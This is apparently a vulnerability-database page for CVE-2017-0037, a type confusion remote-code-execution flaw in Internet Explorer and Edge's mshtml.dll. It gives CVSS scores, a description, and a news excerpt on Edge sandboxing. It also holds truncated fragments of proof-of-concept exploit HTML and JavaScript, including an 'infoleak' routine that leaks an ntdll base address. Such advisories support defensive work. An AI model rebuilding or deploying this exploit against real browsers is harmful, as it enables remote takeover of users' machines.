Published: 26/02/2017 Updated: 19/11/2017

CVSS v2 Base Score: 7.6 | Impact Score: 10 | Exploitability Score: 4.9

CVSS v3 Base Score: 8.1 | Impact Score: 5.9 | Exploitability Score: 2.2

VMScore: 775

Vector: AV:N/AC:H/Au:N/C:C/I:C/A:C

Microsoft Internet Explorer 10 and 11 and Microsoft Edge have a type confusion issue in the Layout::MultiColumnBoxBuilder::HandleColumnBreakOnColumnSpanningElement function in mshtml.dll, which allows remote malicious users to execute arbitrary code via vectors involving a crafted Cascading Style Sheets (CSS) token sequence and crafted JavaScript code that operates on a TH element.

Vulnerable Product	Search on Vulmon	Subscribe to Product
microsoft edge
microsoft internet explorer 11

<!DOCTYPE html> <html> <head> <style> class1 { float: left; column-count: 5; } class2 { column-span: all; columns: 1px; } table {border-spacing: 0px;} </style> <script> var ntdllBase = ""; function infoleak() { var textarea = documentgetElementById( ...

<style> class1 { float: left; column-count: 5; } class2 { column-span: all; columns: 1px; } table {border-spacing: 0px;} </style> <script> function boom() { documentstyleSheets[0]med ...

<!DOCTYPE html> <html> <head> <style> class1 { float: left; column-count: 5; } class2 { column-span: all; columns: 1px; } table {border-spacing: 0px;} </style> <script> var base_leaked_addr = ""; function infoleak() { var textarea = documentgetEleme ...

Microsoft Internet Explorer mshtmldll remote code execution exploit that leverages the issue noted in MS17-007 ...

Microsoft Edge and Internet Explorer suffer from a type confusion in HandleColumnBreakOnColumnSpanningElement ...

CVE-2017-0037 (Microsoft Browser Memory Corruption Vulnerability) This document is about CVE-2017-0037- Microsoft Browser Memory Corruption Vulnerability It will first introduce what a Remote Code Execution (RCE) is and then go over through some technical specifics What is Remote Code Execution? A cyber-attack in which an attacker may remotely execute commands on another comp

More fun in the sandbox: Experts praise security improvements to Edge

The Register • John Leyden • 30 Mar 2017

Time will tell if Microsoft's browser is less ez2pwn

Security watchers have reacted positively to recently announced improvements to Microsoft's Edge browser, which had earned an unenviable reputation for easy pwnage. Redmond is reducing its exposure to malicious exploits by improving Edge's sandboxing technology. Further features have been added to existing technologies like ACG (Arbitrary Code Guard) and CIG (Code Integrity Guard) to prevent remote code execution. ACG1 and CIG2 are designed to make it harder for hackers to load malicious code in...

CVE-2017-0037

Vulnerability Summary

Vulnerability Trend

Exploits

Github Repositories

Recent Articles

References

Vulmon Search

About

Products

Connect